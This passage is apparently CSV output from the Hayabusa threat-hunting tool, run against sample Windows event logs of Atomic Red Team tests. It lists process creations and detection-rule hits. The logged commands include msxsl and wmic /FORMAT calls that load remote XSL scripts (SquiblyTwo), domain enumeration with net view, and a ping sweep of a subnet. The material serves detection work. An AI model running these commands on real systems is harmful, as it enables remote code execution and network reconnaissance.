Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: 